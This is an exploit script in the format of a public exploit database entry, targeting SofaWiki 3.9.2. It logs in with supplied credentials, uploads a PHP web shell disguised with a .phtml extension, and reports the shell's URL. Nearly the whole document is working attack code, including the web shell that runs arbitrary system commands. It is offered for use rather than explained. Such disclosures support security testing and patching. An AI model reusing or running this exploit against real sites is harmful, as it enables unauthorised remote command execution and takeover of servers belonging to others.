# Exploit Title: SofaWiki 3.9.2 - Remote Command Execution (RCE) (Authenticated) # Discovered by: Ahmet Ümit BAYRAM # Discovered Date: 18.04.2024 # Vendor Homepage: https://www.sofawiki.com # Software Link: https://www.sofawiki.com/site/files/snapshot.zip # Tested Version: v3.9.2 (latest) # Tested on: MacOS import requests import random import sys import time def main(): if len(sys.argv) < 4: print("Usage: python exploit.py <base_url> <username> <password>") sys.exit(1) base_url, username, password = sys.argv[1:4] filename = f"{random.randint(10000, 99999)}.phtml" session = requests.Session() login_url = f"{base_url}/index.php" login_data = { "submitlogin": "Login", "username": username, "pass": password, "name": "SofaWiki", "action": "login" } print("Exploiting...") time.sleep(1) response = session.post(login_url, data=login_data) if "Logout" not in response.text: print("Login failed:", response.text) sys.exit() print("Login Successful") time.sleep(1) php_shell_code = """ <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html> """ print("Shell uploading...") time.sleep(1) upload_url = f"{base_url}/index.php" files = { "uploadedfile": (filename, php_shell_code, "text/php"), "action": (None, "uploadfile"), "MAX_FILE_SIZE": (None, "8000000"), "filename": (None, filename), "content": (None, "content") } response = session.post(upload_url, files=files) if response.status_code == 200: print(f"Your shell is ready: {base_url}/site/files/{filename}") else: print("Upload failed:", response.text) if __name__ == "__main__": main() |